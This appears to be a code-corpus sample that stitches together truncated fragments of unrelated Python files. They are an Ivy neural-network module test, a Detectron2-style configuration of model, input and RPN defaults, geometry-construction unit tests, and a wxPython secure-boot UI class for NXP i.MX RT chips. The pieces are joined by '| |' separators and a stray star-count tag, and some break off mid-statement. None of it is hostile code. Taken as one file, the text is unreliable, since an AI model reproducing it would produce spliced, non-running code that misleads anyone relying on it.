module.compile_graph(x)
def loss_fn(v_):
out = module(x, v=v_)
return ivy.reduce_mean(out)[0]
# train
loss_tm1 = 1e12
loss = None
grads = None
for i in range(10):
loss, grads = ivy.execute_with_gradients(loss_fn, module.v)
module.v = ivy.gradient_descent_update(module.v, grads, 1e-3)
assert loss < loss_tm1
loss_tm1 = loss
# type test
assert ivy.is_array(loss)
assert isinstance(grads, ivy.Container)
# cardinality test
if call is helpers.mx_call:
# mxnet slicing cannot reduce dimension to zero
assert loss.shape == (1,)
else:
assert loss.shape == ()
# value test
assert ivy.reduce_max(ivy.abs(grads.linear0.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.linear0.w)) > 0
if not same_layer:
assert ivy.reduce_max(ivy.abs(grads.linear1.b)) > 0
# compilation test
if call is helpers.torch_call:
# pytest scripting does not support **kwargs
return
if not ivy.wrapped_mode():
helpers.assert_compilable(loss_fn)
class TrainableModuleWithDict(ivy.Module):
def __init__(self, in_size, out_size, dev=None, hidden_size=64):
linear0 = ivy.Linear(in_size, hidden_size, dev=dev)
linear1 = ivy.Linear(hidden_size, hidden_size, dev=dev)
linear2 = ivy.Linear(hidden_size, out_size, dev=dev)
self._layers = {'linear0': linear0, 'linear1': linear1, 'linear2': linear2}
ivy.Module.__init__(self, dev)
def _forward(self, x):
x = ivy.expand_dims(x, 0)
x = ivy.tanh(self._layers['linear0'](x))
x = ivy.tanh(self._layers['linear1'](x))
return ivy.tanh(self._layers['linear2'](x))[0]
# module with dict training
@pytest.mark.parametrize(
"bs_ic_oc", [([1, 2], 4, 5)])
def test_module_w_dict_training(bs_ic_oc, dev, compile_graph, call):
# smoke test
if call is helpers.np_call:
# NumPy does not support gradients
pytest.skip()
batch_shape, input_channels, output_channels = bs_ic_oc
x = ivy.cast(ivy.linspace(ivy.zeros(batch_shape), ivy.ones(batch_shape), input_channels), 'float32')
module = TrainableModuleWithDict(input_channels, output_channels, dev=dev)
# compile if this mode is set
if compile_graph and call is helpers.torch_call:
# Currently only PyTorch is supported for ivy compilation
module.compile_graph(x)
def loss_fn(v_):
out = module(x, v=v_)
return ivy.reduce_mean(out)[0]
# train
loss_tm1 = 1e12
loss = None
grads = None
for i in range(10):
loss, grads = ivy.execute_with_gradients(loss_fn, module.v)
module.v = ivy.gradient_descent_update(module.v, grads, 1e-3)
assert loss < loss_tm1
loss_tm1 = loss
# type test
assert ivy.is_array(loss)
assert isinstance(grads, ivy.Container)
# cardinality test
if call is helpers.mx_call:
# mxnet slicing cannot reduce dimension to zero
assert loss.shape == (1,)
else:
assert loss.shape == ()
# value test
assert ivy.reduce_max(ivy.abs(grads.layers.linear0.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.linear0.w)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.linear1.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.linear1.w)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.linear2.b)) > 0
assert ivy.reduce_max(ivy.abs(grads.layers.linear2.w)) > 0
# compilation test
if call is helpers.torch_call:
# pytest scripting does not support **kwargs
return
if not ivy.wrapped_mode():
helpers.assert_compilable(loss_fn)
class WithCustomVarStructure(ivy.Module):
def __init__(self, in_size, out_size, dev=None, hidden_size=64):
self._linear0 = ivy.Linear(in_size, hidden_size, dev=dev)
self._linear1 = ivy.Linear(hidden_size, hidden_size, dev=dev)
self._linear2 = ivy.Linear(hidden_size, out_size, dev=dev)
ivy.Module.__init__(self, dev)
def _create_variables(self, dev):
return ivy.Container(x=self._linear0.v, y=self._linear1.v, z=self._linear2.v)
def _forward(self, x):
pass
# with custom var structure
@pytest.mark.parametrize(
"bs_ic_oc", [([1, 2], 4, 5)])
def test_with_custom_var_structure(bs_ic_oc, dev, call):
# smoke test
if call is helpers.np_call:
# NumPy does not support gradients
pytest.skip()
batch_shape, input_channels, output_channels = bs_ic_oc
module = WithCustomVarStructure(input_channels, output_channels, dev=dev)
assert 'x' in module.v
assert 'y' in module.v
assert 'z' in module.v
class DoubleLinear(ivy.Module):
def | |
<gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .config import CfgNode as CN
# -----------------------------------------------------------------------------
# Convention about Training / Test specific parameters
# -----------------------------------------------------------------------------
# Whenever an argument can be either used for training or for testing, the
# corresponding name will be post-fixed by a _TRAIN for a training parameter,
# or _TEST for a test-specific parameter.
# For example, the number of images during training will be
# IMAGES_PER_BATCH_TRAIN, while the number of images for testing will be
# IMAGES_PER_BATCH_TEST
# -----------------------------------------------------------------------------
# Config definition
# -----------------------------------------------------------------------------
_C = CN()
# The version number, to upgrade from old configs to new ones if any
# changes happen. It's recommended to keep a VERSION in your config file.
_C.VERSION = 2
_C.MODEL = CN()
_C.MODEL.LOAD_PROPOSALS = False
_C.MODEL.MASK_ON = False
_C.MODEL.KEYPOINT_ON = False
_C.MODEL.DEVICE = "cuda"
_C.MODEL.META_ARCHITECTURE = "GeneralizedRCNN"
# Path (a file path, or URL like detectron2://.., https://..) to a checkpoint file
# to be loaded to the model. You can find available models in the model zoo.
_C.MODEL.WEIGHTS = ""
# Values to be used for image normalization (BGR order, since INPUT.FORMAT defaults to BGR).
# To train on images of different number of channels, just set different mean & std.
# Default values are the mean pixel value from ImageNet: [103.53, 116.28, 123.675]
_C.MODEL.PIXEL_MEAN = [103.530, 116.280, 123.675]
# When using pre-trained models in Detectron1 or any MSRA models,
# std has been absorbed into its conv1 weights, so the std needs to be set 1.
# Otherwise, you can use [57.375, 57.120, 58.395] (ImageNet std)
_C.MODEL.PIXEL_STD = [1.0, 1.0, 1.0]
# -----------------------------------------------------------------------------
# INPUT
# -----------------------------------------------------------------------------
_C.INPUT = CN()
# Size of the smallest side of the image during training
_C.INPUT.MIN_SIZE_TRAIN = (800,)
# Sample size of smallest side by choice or random selection from range give by
# INPUT.MIN_SIZE_TRAIN
_C.INPUT.MIN_SIZE_TRAIN_SAMPLING = "choice"
# Maximum size of the side of the image during training
_C.INPUT.MAX_SIZE_TRAIN = 1333
# Size of the smallest side of the image during testing. Set to zero to disable resize in testing.
_C.INPUT.MIN_SIZE_TEST = 800
# Maximum size of the side of the image during testing
_C.INPUT.MAX_SIZE_TEST = 1333
# `True` if cropping is used for data augmentation during training
_C.INPUT.CROP = CN({"ENABLED": False})
# Cropping type:
# - "relative" crop (H * CROP.SIZE[0], W * CROP.SIZE[1]) part of an input of size (H, W)
# - "relative_range" uniformly sample relative crop size from between [CROP.SIZE[0], [CROP.SIZE[1]].
# and [1, 1] and use it as in "relative" scenario.
# - "absolute" crop part of an input with absolute size: (CROP.SIZE[0], CROP.SIZE[1]).
# - "absolute_range", for an input of size (H, W), uniformly sample H_crop in
# [CROP.SIZE[0], min(H, CROP.SIZE[1])] and W_crop in [CROP.SIZE[0], min(W, CROP.SIZE[1])]
_C.INPUT.CROP.TYPE = "relative_range"
# Size of crop in range (0, 1] if CROP.TYPE is "relative" or "relative_range" and in number of
# pixels if CROP.TYPE is "absolute"
_C.INPUT.CROP.SIZE = [0.9, 0.9]
# Whether the model needs RGB, YUV, HSV etc.
# Should be one of the modes defined here, as we use PIL to read the image:
# https://pillow.readthedocs.io/en/stable/handbook/concepts.html#concept-modes
# with BGR being the one exception. One can set image format to BGR, we will
# internally use RGB for conversion and flip the channels over
_C.INPUT.FORMAT = "BGR"
# The ground truth mask format that the model will use.
# Mask R-CNN supports either "polygon" or "bitmask" as ground truth.
_C.INPUT.MASK_FORMAT = "polygon" # alternative: "bitmask"
# -----------------------------------------------------------------------------
# Dataset
# -----------------------------------------------------------------------------
_C.DATASETS = CN()
# List of the dataset names for training. Must be registered in DatasetCatalog
_C.DATASETS.TRAIN = ()
# List of the pre-computed proposal files for training, which must be consistent
# with datasets listed in DATASETS.TRAIN.
_C.DATASETS.PROPOSAL_FILES_TRAIN = ()
# Number of top scoring precomputed proposals to keep for training
_C.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TRAIN = 2000
# List of the dataset names for testing. Must be registered in DatasetCatalog
_C.DATASETS.TEST = ()
# List of the pre-computed proposal files for test, which must be consistent
# with datasets listed in DATASETS.TEST.
_C.DATASETS.PROPOSAL_FILES_TEST = ()
# Number of top scoring precomputed proposals to keep for test
_C.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TEST = 1000
# -----------------------------------------------------------------------------
# DataLoader
# -----------------------------------------------------------------------------
_C.DATALOADER = CN()
# Number of data loading threads
_C.DATALOADER.NUM_WORKERS = 4
# If True, each batch should contain only images for which the aspect ratio
# is compatible. This groups portrait images together, and landscape images
# are not batched with portrait images.
_C.DATALOADER.ASPECT_RATIO_GROUPING = True
# Options: TrainingSampler, RepeatFactorTrainingSampler
_C.DATALOADER.SAMPLER_TRAIN = "TrainingSampler"
# Repeat threshold for RepeatFactorTrainingSampler
_C.DATALOADER.REPEAT_THRESHOLD = 0.0
# Tf True, when working on datasets that have instance annotations, the
# training dataloader will filter out images without associated annotations
_C.DATALOADER.FILTER_EMPTY_ANNOTATIONS = True
# ---------------------------------------------------------------------------- #
# Backbone options
# ---------------------------------------------------------------------------- #
_C.MODEL.BACKBONE = CN()
_C.MODEL.BACKBONE.NAME = "build_resnet_backbone"
# Freeze the first several stages so they are not trained.
# There are 5 stages in ResNet. The first is a convolution, and the following
# stages are each group of residual blocks.
_C.MODEL.BACKBONE.FREEZE_AT = 2
# ---------------------------------------------------------------------------- #
# FPN options
# ---------------------------------------------------------------------------- #
_C.MODEL.FPN = CN()
# Names of the input feature maps to be used by FPN
# They must have contiguous power of 2 strides
# e.g., ["res2", "res3", "res4", "res5"]
_C.MODEL.FPN.IN_FEATURES = []
_C.MODEL.FPN.OUT_CHANNELS = 256
# Options: "" (no norm), "GN"
_C.MODEL.FPN.NORM = ""
# Types for fusing the FPN top-down and lateral features. Can be either "sum" or "avg"
_C.MODEL.FPN.FUSE_TYPE = "sum"
# ---------------------------------------------------------------------------- #
# Proposal generator options
# ---------------------------------------------------------------------------- #
_C.MODEL.PROPOSAL_GENERATOR = CN()
# Current proposal generators include "RPN", "RRPN" and "PrecomputedProposals"
_C.MODEL.PROPOSAL_GENERATOR.NAME = "RPN"
# Proposal height and width both need to be greater than MIN_SIZE
# (a the scale used during training or inference)
_C.MODEL.PROPOSAL_GENERATOR.MIN_SIZE = 0
# ---------------------------------------------------------------------------- #
# Anchor generator options
# ---------------------------------------------------------------------------- #
_C.MODEL.ANCHOR_GENERATOR = CN()
# The generator can be any name in the ANCHOR_GENERATOR registry
_C.MODEL.ANCHOR_GENERATOR.NAME = "DefaultAnchorGenerator"
# Anchor sizes (i.e. sqrt of area) in absolute pixels w.r.t. the network input.
# Format: list[list[float]]. SIZES[i] specifies the list of sizes
# to use for IN_FEATURES[i]; len(SIZES) == len(IN_FEATURES) must be true,
# or len(SIZES) == 1 is true and size list SIZES[0] is used for all
# IN_FEATURES.
_C.MODEL.ANCHOR_GENERATOR.SIZES = [[32, 64, 128, 256, 512]]
# Anchor aspect ratios. For each area given in `SIZES`, anchors with different aspect
# ratios are generated by an anchor generator.
# Format: list[list[float]]. ASPECT_RATIOS[i] specifies the list of aspect ratios (H/W)
# to use for IN_FEATURES[i]; len(ASPECT_RATIOS) == len(IN_FEATURES) must be true,
# or len(ASPECT_RATIOS) == 1 is true and aspect ratio list ASPECT_RATIOS[0] is used
# for all IN_FEATURES.
_C.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS = [[0.5, 1.0, 2.0]]
# Anchor angles.
# list[list[float]], the angle in degrees, for each input feature map.
# ANGLES[i] specifies the list of angles for IN_FEATURES[i].
_C.MODEL.ANCHOR_GENERATOR.ANGLES = [[-90, 0, 90]]
# Relative offset between the center of the first anchor and the top-left corner of the image
# Value has to be in [0, 1). Recommend to use 0.5, which means half stride.
# The value is not expected to affect model accuracy.
_C.MODEL.ANCHOR_GENERATOR.OFFSET = 0.0
# ---------------------------------------------------------------------------- #
# RPN options
# ---------------------------------------------------------------------------- #
_C.MODEL.RPN = CN()
_C.MODEL.RPN.HEAD_NAME = "StandardRPNHead" # used by RPN_HEAD_REGISTRY
# Names of the input feature maps to be used by RPN
# e.g., ["p2", "p3", "p4", "p5", "p6"] for FPN
_C.MODEL.RPN.IN_FEATURES = ["res4"]
# Remove RPN anchors that go outside the image by BOUNDARY_THRESH pixels
# Set to -1 or a large value, e.g. 100000, to disable pruning anchors
_C.MODEL.RPN.BOUNDARY_THRESH = -1
# IOU overlap ratios [BG_IOU_THRESHOLD, FG_IOU_THRESHOLD]
# Minimum overlap required between an anchor and ground-truth box for the
# (anchor, gt box) pair to be a positive example (IoU >= FG_IOU_THRESHOLD
# ==> positive RPN example: 1)
# Maximum overlap allowed between an anchor and ground-truth box for the
# (anchor, gt box) pair to be a negative examples (IoU < BG_IOU_THRESHOLD
# ==> negative RPN example: 0)
# Anchors with overlap in between (BG_IOU_THRESHOLD <= IoU < FG_IOU_THRESHOLD)
# are ignored (-1)
_C.MODEL.RPN.IOU_THRESHOLDS = [0.3, 0.7]
_C.MODEL.RPN.IOU_LABELS = [0, -1, 1]
# Number of regions per image used to train RPN
_C.MODEL.RPN.BATCH_SIZE_PER_IMAGE = 256
# Target fraction of foreground (positive) examples per RPN minibatch
_C.MODEL.RPN.POSITIVE_FRACTION = 0.5
# Options are: "smooth_l1", "giou"
_C.MODEL.RPN.BBOX_REG_LOSS_TYPE = "smooth_l1"
_C.MODEL.RPN.BBOX_REG_LOSS_WEIGHT = 1.0
# Weights on (dx, dy, dw, dh) for normalizing RPN anchor regression targets
_C.MODEL.RPN.BBOX_REG_WEIGHTS = (1.0, 1.0, 1.0, 1.0)
# The transition point from L1 to L2 loss. Set to 0.0 to make the loss simply L1.
_C.MODEL.RPN.SMOOTH_L1_BETA = 0.0
_C.MODEL.RPN.LOSS_WEIGHT = 1.0
# Number of top scoring RPN proposals to keep before applying NMS
# When FPN is used, this is *per FPN level* (not total)
_C.MODEL.RPN.PRE_NMS_TOPK_TRAIN = 12000
_C.MODEL.RPN.PRE_NMS_TOPK_TEST = 6000
# Number of top scoring RPN proposals to keep after applying NMS
# When FPN is used, this limit is applied per level and then again to the | |
import copy
from .test_constants import GeometryTestCase
from geompy.core.Construction import Construction
from geompy.core.Point import Point
from geompy.core.Line import Line
from geompy.core.PrebuiltConstructions import BaseConstruction
from geompy.core.Angle import Angle
from geompy.cas import sympify
from copy import deepcopy
class TestConstruction(GeometryTestCase):
def setUp(self) -> None:
self.pointA = Point(0, 0)
self.pointB = Point(1, 0)
self.construction1 = Construction()
self.construction1.add_point(self.pointA)
self.construction1.add_point(self.pointB)
def test_eq_same_construction(self):
construction2 = deepcopy(self.construction1)
self.assertEqual(self.construction1, construction2)
self.assertHashEqual(self.construction1, construction2)
construction2.add_line(self.pointA, self.pointB)
construction2_copy = deepcopy(construction2)
self.assertEqual(construction2, construction2_copy)
self.assertHashEqual(construction2, construction2_copy)
construction3 = deepcopy(self.construction1)
construction3.add_circle(self.pointA, point2=self.pointB)
construction3_copy = deepcopy(construction3)
self.assertEqual(construction3, construction3_copy)
self.assertHashEqual(construction3, construction3_copy)
construction4 = deepcopy(self.construction1)
construction4.add_circle(self.pointB, point2=self.pointA)
construction4_copy = deepcopy(construction4)
self.assertEqual(construction4, construction4_copy)
self.assertHashEqual(construction4, construction4_copy)
def test_eq_conjugate_constructions(self):
# Conjugate constructions are constructions that are simply permutations of each other's steps.
# They yield the same steps and the same points, but generate them in a different order
construction2 = deepcopy(self.construction1)
construction2.add_circle(self.pointA, point2=self.pointB)
construction2.add_circle(self.pointB, point2=self.pointA)
construction3 = deepcopy(self.construction1)
construction3.add_circle(self.pointB, point2=self.pointA)
construction3.add_circle(self.pointA, point2=self.pointB)
self.assertEqual(construction2, construction3)
self.assertHashEqual(construction2, construction3)
construction2.add_line(self.pointA, self.pointB)
construction3.add_line(self.pointB, self.pointA)
self.assertEqual(construction2, construction3)
self.assertHashEqual(construction2, construction3)
def test_len(self):
construction = deepcopy(self.construction1)
self.assertEqual(len(construction), 0)
construction.add_line(self.pointA, self.pointB)
self.assertEqual(len(construction), 1)
# Make sure adding duplicate does not effect length
construction.add_line(self.pointA, self.pointB)
self.assertEqual(len(construction), 1)
# Add second step
construction.add_circle(self.pointA, point2=self.pointB)
self.assertEqual(len(construction), 2)
def test_intersection_line_line_parallel(self):
# two parallel lines should not give any intersections
construction = deepcopy(self.construction1)
line1 = construction.add_line(self.pointA, self.pointB)
point_c = Point(0, 1)
point_d = Point(1, 1)
construction.add_point(point_c)
construction.add_point(point_d)
line2 = construction.add_line(point_c, point_d)
point_e = Point(0, 10)
point_f = Point(1, 10)
construction.add_point(point_e)
construction.add_point(point_f)
line3 = construction.add_line(point_e, point_f)
self.assertEqual(construction.update_intersections_with_object(line1), set())
self.assertEqual(construction.update_intersections_with_object(line2), set())
self.assertEqual(construction.update_intersections_with_object(line3), set())
def test_intersection_line_line_intersecting(self):
# two parallel lines should not give any intersections
construction = deepcopy(self.construction1)
line1 = construction.add_line(self.pointA, self.pointB)
point_c = Point(2, 2)
point_d = Point(1, 1)
construction.add_point(point_c)
construction.add_point(point_d)
line2 = construction.add_line(point_c, point_d)
self.assertEqual(construction.update_intersections_with_object(line2), {Point(0, 0)})
point_e = Point(2, 2)
point_f = Point(3, 1)
construction.add_point(point_e)
construction.add_point(point_f)
line3 = construction.add_line(point_e, point_f)
self.assertEqual(construction.update_intersections_with_object(line3), {Point(2, 2), Point(4, 0)})
def test_intersection_circle_line_no_intersection(self):
construction = self.construction1
circle = construction.add_circle(self.pointA, self.pointB)
point_c = Point(10, 0)
point_d = Point(0, 10)
line = construction.add_line(point_c, point_d)
self.assertEqual(construction.update_intersections_with_object(line), set())
self.assertEqual(construction.update_intersections_with_object(circle), set())
def test_intersection_circle_line_tangent(self):
construction = self.construction1
circle = construction.add_circle(self.pointA, self.pointB)
point_c = Point(0, 1)
point_d = Point(1, 1)
line = construction.add_line(point_c, point_d)
self.assertEqual(construction.update_intersections_with_object(line), {Point(0, 1)})
self.assertEqual(construction.update_intersections_with_object(circle), {Point(0, 1)})
def test_intersection_circle_line_tangent2(self):
construction = self.construction1
# Circle with radius=2, so we can avoid using sqrt in this test
circle = construction.add_circle(self.pointA, Point(1, 1))
point_c = Point(0, 2)
point_d = Point(2, 0)
line = construction.add_line(point_c, point_d)
print(construction.find_intersections(circle, line))
self.assertEqual(construction.update_intersections_with_object(line), {Point(1, 1)})
self.assertEqual(construction.update_intersections_with_object(circle), {Point(1, 1)})
def test_intersection_circle_line_secant(self):
construction = self.construction1
# Circle with radius=2, so we can avoid using sqrt in this test
circle = construction.add_circle(self.pointA, self.pointB)
point_c = Point(0, 1)
point_d = Point(1, 0)
line = construction.add_line(point_c, point_d)
self.assertEqual(construction.update_intersections_with_object(line), {Point(1, 0), Point(0, 1)})
self.assertEqual(construction.update_intersections_with_object(circle), {Point(1, 0), Point(0, 1)})
def test_check_if_points_on_same_side(self):
a = Point(0, 0)
b = Point(1, 0)
c = Point(1, 1)
d = Point(2, 2)
e = Point(-1, -2)
line1 = Line(a, b)
self.assertTrue(Construction.check_if_points_on_same_side(line1, c, d))
self.assertFalse(Construction.check_if_points_on_same_side(line1, c, e))
line2 = Line(a, c)
self.assertTrue(Construction.check_if_points_on_same_side(line2, b, e))
self.assertRaises(ValueError, lambda: Construction.check_if_points_on_same_side(line1, a, c))
line3 = Line(b, c) # Vertical Line
self.assertFalse(Construction.check_if_points_on_same_side(line3, d, e))
self.assertTrue(Construction.check_if_points_on_same_side(line3, Point(10, 100), Point(10, 0)))
def test_EuclidI2(self):
construction = BaseConstruction()
a, b = construction.points
c = construction.add_point(Point(1, 1))
new_line = construction.EuclidI2(Line(a, b), c)
self.assertEqual(abs(Line(a, b)), abs(new_line))
def test_EuclidI3(self):
construction = BaseConstruction()
a, b = construction.points
c = construction.add_point(Point(10, 10, name='C'))
short_line = construction.add_line(a, b)
long_line = construction.add_line(a, c)
shortened_line = construction.EuclidI3(short_line=short_line, long_line=long_line)
self.assertEqual(abs(Line(a, b)), abs(shortened_line))
def test_EuclidI10(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
line_ab = construction.add_line(a, b)
midpoint = construction.EuclidI10(line_ab)
self.assertEqual(Point('1/2', 0), midpoint)
midpoint = construction.Midpoint(line_ab)
self.assertEqual(Point('1/2', 0), midpoint)
def test_PerpendicularBisector(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
line_ab = construction.add_line(a, b)
bisector = construction.PerpendicularBisector(line_ab)
self.assertEqual(Line(Point('1/2', 0), Point('1/2', 1)), bisector)
def test_ErectPerpendicular(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
line_ab = construction.add_line(a, b)
bisector = construction.EuclidI11(line_ab, Point('1/2', 0))
self.assertEqual(Line(Point('1/2', 0), Point('1/2', 1)), bisector)
def test_ErectPerpendicularPointNotOnLineFails(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
c = construction.add_point(Point(1, 10, name='C'))
self.assertRaises(ValueError, lambda: construction.ErectPerpendicular(Line(a, b), c))
def test_DropPerpendicular(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
line_ab = construction.add_line(a, b)
bisector = construction.EuclidI12(line_ab, Point('1/2', 1))
self.assertEqual(Line(Point('1/2', 0), Point('1/2', 1)), bisector)
def test_DropPerpendicularPointOnLineFails(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
c = construction.add_point(Point(10, 0, name='C'))
self.assertRaises(ValueError, lambda: construction.DropPerpendicular(Line(a, b), c))
def test_Perpendicular(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
c = construction.add_point(Point(1, 10, name='C'))
perpendicular = construction.Perpendicular(Line(a, b), c)
self.assertEqual(Line(Point(1, 0), Point(1, 10)), perpendicular)
d = construction.add_point(Point(0, 10, name='D'))
perpendicular = construction.Perpendicular(Line(a, b), d)
self.assertEqual(Line(Point(0, 0), Point(0, 10)), perpendicular)
def test_Parallel(self):
construction = BaseConstruction()
a = Point(1, 1)
parallel = construction.ParallelLine(Line(*construction.points), a)
self.assertEqual(0, parallel.slope)
self.assertEqual(1, parallel.intercept)
def test_EuclidI9(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
c = construction.add_point(Point(1, 1, name='C'))
line_ab = construction.add_line(a, b)
line_ac = construction.add_line(a, c)
angle_abc = Angle(line_ab, line_ac, a)
line_bisecting_angle_abc = construction.EuclidI9(angle_abc)
# Test if the line is the angle bisector by testing if the two sub angles are equal
self.assertEqual(Angle(line_bisecting_angle_abc, line_ab, a), Angle(line_bisecting_angle_abc, line_ab, a))
def test_Intersections_WeirdTypes_Fails(self):
construction = BaseConstruction()
a, b = construction.points
line_ab = Line(a, b)
self.assertRaises(NotImplementedError, lambda: construction.find_intersections(a, b)) # Two Points
self.assertRaises(NotImplementedError, lambda: construction.find_intersections(2, 3)) # Two ints
self.assertRaises(NotImplementedError, lambda: construction.find_intersections(a, 2)) # int and point
self.assertRaises(NotImplementedError, lambda: construction.find_intersections(a, line_ab)) # line and point
def test_intersect_circles_that_do_not_intersect(self):
"""Generate two circles that do NOT intersect. Should give an empty set as the intersections"""
construction = Construction()
a = construction.add_point(Point(0, 0))
b = construction.add_point(Point(1, 0))
c = construction.add_point(Point(5, 0))
d = construction.add_point(Point(6, 0))
circle_ab = construction.add_circle(center=a, point2=b)
circle_cd = construction.add_circle(center=c, point2=d)
intersections = construction.find_intersections_circle_circle(circle_ab, circle_cd)
self.assertEqual(set(), intersections)
def test_find_point(self):
construction = BaseConstruction()
# Point is in construction
a = Point(0, 0)
self.assertEqual(a, construction.find_point(a))
# Point is not in construction
c = Point(10, 10)
self.assertEqual(None, construction.find_point(c))
def test_check_lengths(self):
construction = BaseConstruction()
construction.add_point(Point(0, 1))
construction.add_point(Point(1, 1))
# Present lengths are 1 and sqrt(2).
self.assertTrue(construction.check_lengths(1))
self.assertTrue(construction.check_lengths(sympify('sqrt(2)')))
# All other lengths should not be present
self.assertFalse(construction.check_lengths(2))
def test_get_present_lengths(self):
construction = BaseConstruction()
construction.add_point(Point(0, 1))
construction.add_point(Point(1, 1))
# There are only two present lengths, so the length of the dictionary should be 2
self.assertEqual(2, len(construction.get_present_lengths()))
def test_add_random_construction(self):
for i in range(5):
construction = BaseConstruction()
construction.add_random_construction(i)
self.assertEqual(i, len(construction))
def test_update_valid_actions_no_force(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
# At first, we have only 3 valid actions.
self.assertEqual(3, len(construction.actions))
# Now we check if checking the actions at each step gives us the same as checking just at the end (Just in time)
construction2 = copy.deepcopy(construction)
# Add the line AB
construction.add_line(*construction.points)
construction2.add_line(*construction2.points)
self.assertEqual(2, len(construction.actions)) # Only check the first construction
# Circle A rAB
construction.add_circle(center=a, point2=b)
construction2.add_circle(center=a, point2=b)
self.assertEqual(4, len(construction.actions),
msg=f'These are the actions: {construction.actions} of construction\n {construction}')
self.assertEqual(4, len(construction2.actions),
msg=f'These are the actions: {construction.actions} of construction\n {construction}')
self.assertEqual(construction.actions, construction2.actions)
def test_update_valid_actions_with_force(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
# At first, we have only 3 valid actions.
self.assertEqual(3, len(construction.update_valid_actions(force_calculate=True)))
# Now we check if checking the actions at each step gives us the same as checking just at the end (Just in time)
construction2 = copy.deepcopy(construction)
# Add the line | |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import wx
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import time
import RTyyyy_uidef
import uidef
import uivar
import uilang
sys.path.append(os.path.abspath(".."))
from mem import memcore
from run import RTyyyy_rundef
from run import rundef
from fuse import RTyyyy_fusedef
class secBootRTyyyyUi(memcore.secBootMem):
def __init__(self, parent):
memcore.secBootMem.__init__(self, parent)
if self.mcuSeries in uidef.kMcuSeries_iMXRTyyyy:
self.RTyyyy_initUi()
def RTyyyy_initUi( self ):
self.isXipableDevice = False
self.isNandDevice = False
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = None
self.sbAccessBootDeviceMagic = None
self._RTyyyy_initTargetSetupValue()
self.RTyyyy_setTargetSetupValue()
self.secureBootType = None
self.keyStorageRegion = None
self.isCertEnabledForHwCrypto = None
self._RTyyyy_initSecureBootSeqValue()
self._RTyyyy_initSecureBootSeqColor()
self.RTyyyy_setLanguage()
def _RTyyyy_initTargetSetupValue( self ):
self.m_choice_bootDevice.Clear()
self.m_choice_bootDevice.SetItems(RTyyyy_uidef.kBootDevice_Latest)
totalSel = self.m_choice_bootDevice.GetCount()
if self.toolCommDict['bootDevice'] < totalSel:
self.m_choice_bootDevice.SetSelection(self.toolCommDict['bootDevice'])
else:
self.m_choice_bootDevice.SetSelection(0)
def _setFlexspiNorDeviceForEvkBoard( self ):
try:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_ISSI_IS25LP064A
flexspiNorOpt1 = 0x0
flexspiDeviceModel = self.tgt.flexspiNorDevice
if flexspiDeviceModel == uidef.kFlexspiNorDevice_ISSI_IS25LP064A:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_ISSI_IS25LP064A
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_ISSI_IS26KS512S:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_ISSI_IS26KS512S
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_MXIC_MX25UM51245G:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_MXIC_MX25UM51245G
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_MXIC_MX25UM51345G:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_MXIC_MX25UM51345G
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Micron_MT35X:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Micron_MT35X
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Adesto_AT25SF128A:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Adesto_AT25SF128A
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Adesto_ATXP032:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Adesto_ATXP032
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Cypress_S26KS512S:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Cypress_S26KS512S
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_GigaDevice_GD25LB256E:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_GigaDevice_GD25LB256E
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_GigaDevice_GD25LT256E:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_GigaDevice_GD25LT256E
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_GigaDevice_GD25LX256E:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_GigaDevice_GD25LX256E
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Winbond_W25Q128JV:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Winbond_W25Q128JV
else:
pass
uivar.setBootDeviceConfiguration(uidef.kBootDevice_XspiNor, flexspiNorOpt0, flexspiNorOpt1, flexspiDeviceModel)
except:
pass
